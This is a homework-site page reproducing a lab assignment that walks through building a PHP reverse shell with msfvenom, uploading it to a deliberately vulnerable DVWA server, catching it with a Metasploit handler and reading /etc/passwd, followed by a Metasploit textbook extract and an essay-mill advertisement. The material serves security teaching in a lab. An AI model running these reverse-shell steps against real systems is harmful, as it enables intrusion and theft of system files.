Chat with us, powered by LiveChat Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. | Wridemy

Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary.

Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary.

Please follow the project Action Item and Provide 

 Take a screenshot of the terminal window showing the content of the passwd file. 

Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed,
summarize, and interact with the content covered in this project. Summarize what you did as an
attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention
the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if
you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should
think and write critically, not just about what was presented but also what you have learned through the
session. You can ask questions for the things you're confused about. Questions asked here will be
summarized and answered anonymously in the next class. 

Project-1: Getting a Reverse Shell

In this project, you are assigned the task of stealing /etc/passwd file of OWASP BWA computer in a CTF (Capture-the-Flag) event. You discovered that OWASP BWA has a vulnerable web application. First, you crack the password of the web application, and then you log in to the web application and try to exploit it in a way that allows you to steal the passwd file of the server on which this web app is running.

Reminder

Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting the project.

Computers

Notes:

1) You will perform all of your actions from Kali Linux.

2) You cannot copy and paste between your computer and the computers on Netlab environment; however, it will be both quicker and more reliable if you use your keyboard's tab key after writing the first 2-3 letters of each command/command parameters in Metasploit

3) Use CTRL – to shrink the fonts on Kali Linux terminal windows; alternatively you can click on the View menu and then the Shrink Font menu item.

Steps of Hacking

1. Optional: Crack the password of the admin user of the web application http://192.168.2.15/dvwa/login.php application. (This is the same lab you performed in Lab-7, Section-3)

2. Create a PHP backdoor (reverse PHP shell) by using msfvenom (A tool from Metasploit Framework)

3. Upload the PHP backdoor to the web application (Being able to upload a PHP is yet another vulnerability, easy to exploit, though. You will practice this local file upload vulnerability in detail in Lab-8, Section-2)

4. Prepare a handler on Kali Linux that will wait for the connection requests from the exploited web application and later on send commands to the same web application.

5. Call the reverse shell you uploaded (Open the PHP file on the browser on Kali)

6. Send a command to the vulnerable web application and fetch the /etc/passwd file of the OWASP BWA computer by sending a command (192.168.2.15)

The List of Actions/Commands per Step

1. Crack the password of the admin user of the web application

This part is optional. If you want to practice is once more, see Lab-7, Section-3. This part has been included in the project for the sake of logical completeness. If this were a real hacking case, the hacker would have to perform this step before the upcoming steps.

2. Create a PHP backdoor (reverse shell)

Command

Notes

msfvenom -p php/reverse_php LHOST=192.168.2.10 LPORT=443 -f raw > reverseshell.php

File created: reverseshell.php

3. Upload PHP backdoor to the DVWA

Find the link to upload a file from the left menu after logging into the web app using the cracked password. Refer to the Lab-8, Section-2 instructions to see the solution.

4. Prepare a handler on Kali Linux

A PHP reverse shell on its own does not allow you to connect to the remote server (OWASP BWA). There should be a corresponding handler that will respond to the connection request from the PHP reverse shell and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the frequency of the RC unit should be compatible with the frequency of the receiver in the car. Similarly, the parameter of the handler you are creating should be in full harmony with the parameters of the PHP shell.

Commands

Notes

msfconsole

This command opens the Metasploit Framework.

search handler

This is an informational command. Just try to find handler among search results

use exploit/multi/handler

Using a multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it is the reverseshell.php file)

set payload php/reverse_php

Using reverse_php payload for this handler. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

show options

This is yet another informational command. To show the options of the payload

set lhost 192.168.2.10

Option-1. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

set lport 443

Option-2. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy.

exploit

Run handler

5. Call the reverse shell

After uploading the PHP file (in Step-3), the web application returned the path where the reverse shell has been uploaded. Copy that path and append to the URL in a meaningful way and hit enter.

6. Send a command to the vulnerable web application and fetch the /etc/passwd file

Switch to the terminal window where you run the handler by exploit command. If you uploaded the PHP file in Step-3 and then called the file in Step-5 accurately, the PHP has already opened a connection to the handler and been waiting for the handler's commands. You should also see the message of handler similar to "Command shell session 1 opened (192.168.2.10:443 -> 192.168.2.15:54585 at YYYY-MM-DD HH:MM:SS +Timezone)”

If you see the message above, send the command to dump the /etc/passwd

to the terminal window; there is a standard command in Linux called cat that writes the content of the files to the screen.

Take a screenshot of the terminal window showing the content of the passwd file.

Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.

image6.png

image7.png

image1.png

image2.png

image3.png

image4.png

image5.png

,

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 1/51

Chapter 3: Metasploit Components and Environment Configuration For any tool that we use to perform a

particular task, it's always helpful to

know that tool inside out. A detailed un-

derstanding of the tool enables us to use

it appropriately, making it perform to the

fullest of its capability. Now that you

have learned some of the absolute basics

of the Metasploit Framework and how to

install it, in this chapter you will learn

how the Metasploit Framework is struc-

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 2/51

tured and the various components of the

Metasploit ecosystem.

The following topics will be covered in

this chapter:

Anatomy and structure of Metasploit

Metasploit components: auxiliaries, ex-

ploits, encoders, payloads, and post

Getting started with msfconsole and

common commands

Variables in Metasploit

Updating the Metasploit Framework

Technical requirements The following software is required:

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 3/51

Kali Linux

Metasploit Framework

Anatomy and structure of Metasploit The simplest method to learn the struc-

ture of Metasploit Framework is to

browse and explore through its applica-

tion directory. In Kali Linux, the

Metasploit Framework can be located at

/usr/share/metasploit-framework, as

shown in the following screenshot:

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 4/51

Figure 3.1 – Metasploit Framework

directory

At a broad level, the Metasploit

Framework structure is as shown in the

following screenshot:

Figure 3.2 – Metasploit Framework

Structure

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 5/51

We'll be using tools/utilities from each of

these categories as we progress through

the book.

In the next section, we'll have a brief

overview of all the Metasploit

components.

Metasploit components and environment configuration The Metasploit Framework has various

component categories based on their role

in the penetration testing phases. Each of

the component categories has various

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 6/51

modules and plugins that we can use in

the exploitation process.

The following sections will provide a de-

tailed understanding of what each com-

ponent category is responsible for.

Auxiliaries

You have learned so far that Metasploit is

a complete penetration testing frame-

work and not just a tool. When we call it

a framework, it means that it consists of

many useful tools and utilities. Auxiliary

modules in the Metasploit Framework

are nothing but small pieces of code that

are meant to perform a specific task (in

the scope of our penetration testing life

cycle). For example, you might need to

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 7/51

perform a simple task of verifying

whether a certificate of a particular

server has expired or not, or you might

want to scan your subnet and check

whether any of the FTP servers allow

anonymous access.

Such tasks can be very easily accom-

plished using the auxiliary modules

present in the Metasploit Framework.

There are more than 1,000 auxiliary

modules spread across 19 categories in

the Metasploit Framework.

The following table shows various cate-

gories of auxiliary modules present in

the Metasploit Framework:

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 8/51

Don't get overwhelmed with the number

of auxiliary modules present in the

Metasploit Framework. You may not

need to know each and every module in-

dividually. You just need to search for the

right module in the required context and

use it accordingly. We will now see how

to use an auxiliary module.

During the course of this book, we will

use many different auxiliary modules as

and when required; however, let's get

started with a simple example:

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 9/51

1. Open up a terminal window and start

Metasploit using the msfconsole

command.

2. Select the portscan/tcp auxiliary mod-

ule to perform a port scan against a tar-

get system.

3. Using the show command, list all the pa-

rameters that need to be configured in

order to run this auxiliary module.

4. Using the set RHOSTS command, set the

IP address of our target system.

5. Using the set PORTS command, select

the port range you want to scan on

your target system.

6. Using the run command, execute the

auxiliary module with the parameters

configured earlier.

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 10/51

You can see the use of all the previously

mentioned commands in the following

screenshot:

Figure 3.3 – Auxiliary TCP Port Scanner

Next, we will be covering payloads.

Payloads

To understand what a payload does, let's

consider a real-world example. A mili-

tary unit of a certain country develops a

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 11/51

new missile that can travel a range of 500

km at very high speed. Now, the missile is

of no use unless it's armed with the right

kind of ammunition. Now, the military

unit decided to load high explosive mate-

rial within the missile so that when the

missile hits the target, the explosive ma-

terial within the missile explodes and

causes the required damage to the en-

emy. In this case, the high explosive ma-

terial within the missile is the payload.

The payload can be changed based on the

severity of damage that is to be caused by

the missile.

Similarly, payloads in the Metasploit

Framework let us decide what action is

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 12/51

to be performed on the target system

once the exploit is successful.

Singles: These are sometimes also re-

ferred to as inline or non-staged pay-

loads. Payloads in this category are a

completely self-contained unit of the

exploit and require shellcode, which

means they have everything that is re-

quired to exploit the vulnerability on

the target. The disadvantage of such

payloads is their size. Since they con-

tain the complete exploit and shellcode,

they can be quite bulky at times, ren-

dering them useless in scenarios with

size restrictions.

Stagers: There are certain scenarios

where the size of the payload matters a

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 13/51

lot. A payload with even a single byte

extra may not function well on the tar-

get system. The stager's payload comes

in handy in such a situation. The

stager's payload simply sets up a con-

nection between the attacking system

and the target system. It doesn't have

the shellcode necessary to exploit the

vulnerability on the target system.

Being very small in size, it fits in well in

many scenarios.

Stages: Once the stager payload has set

up a connection between the attacking

system and the target system, the stages

payloads are then downloaded on the

target system. They contain the re-

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 14/51

quired shellcode to exploit the vulnera-

bility on the target system.

The following screenshot shows a sample

payload that can be used to obtain a re-

verse TCP shell from a compromised

Windows system:

Figure 3.4 – Reverse TCP Payload

You will be learning how to use various

payloads along with exploits, in the up-

coming chapters.

Exploits

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 15/51

Exploits are a crucial part of the

Metasploit Framework. An exploit is

nothing but the actual piece of code that

gives the required access to the target

system. There are more than 2,500 ex-

ploits spread across more than 19 cate-

gories based on platform supported by

exploit. Now, you might be thinking that,

out of so many available exploits, which

is the one that needs to be used? The de-

cision to use a particular exploit against a

target can be made only after extensive

enumeration and vulnerability assess-

ment of our target. (Refer to the section

penetration testing life cycle in Chapter 1,

Introduction to Metasploit and Supporting

Tools).

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 16/51

Proper enumeration and a vulnerability

assessment of the target will give us the

following information based on which

we can choose the correct exploit:

Operating system of the target system

(including exact version and

architecture)

Open ports on the target system

(Transmission Control Protocol (TCP)

and User Datagram Protocol (UDP)

Services along with versions running

on the target system

Probability of a particular service being

vulnerable

The following table shows the various

categories of exploits available in the

Metasploit Framework:

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 17/51

In the upcoming chapters, we'll see how

to use an exploit against a vulnerable tar-

get. Now, we will move ahead to under-

stand the use of encoders during

exploitation.

Encoders

In any real-world penetration testing sce-

nario, it's quite possible that our attempt

to attack the target system would be de-

tected by some kind of security software

present on the target system. This may

jeopardize all our efforts to gain access to

the remote system. This is exactly when

encoders come to the rescue. The job of

11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 18/51

the encoders is to obfuscate our exploit

and payload in such a way that, in the

target system, it goes unnoticed by all of

the security systems.

The following table shows the various en-

coder categories available in the

Metasploit Framework:

We'll be looking at encoders in more de-

tail in the upcoming chapters. We'll now

move ahead to understand use of NOPs

Our website has a team of professional writers who can help you write any of your homework. They will write your papers from scratch. We also have a team of editors just to make sure all papers are of HIGH QUALITY & PLAGIARISM FREE. To make an Order you only need to click Ask A Question and we will direct you to our Order Page at WriteDemy. Then fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.

Fill in all the assignment paper details that are required in the order form with the standard information being the page count, deadline, academic level and type of paper. It is advisable to have this information at hand so that you can quickly fill in the necessary information needed in the form for the essay writer to be immediately assigned to your writing project. Make payment for the custom essay order to enable us to assign a suitable writer to your order. Payments are made through Paypal on a secured billing page. Finally, sit back and relax.

Do you need an answer to this or any other questions?

About Wridemy

We are a professional paper writing website. If you have searched a question and bumped into our website just know you are in the right place to get help in your coursework. We offer HIGH QUALITY & PLAGIARISM FREE Papers.

How It Works

To make an Order you only need to click on “Order Now” and we will direct you to our Order Page. Fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.

Are there Discounts?

All new clients are eligible for 20% off in their first Order. Our payment method is safe and secure.

Hire a tutor today CLICK HERE to make your first order

Related Tags

Academic APA Writing College Course Discussion Management English Finance General Graduate History Information Justify Literature MLA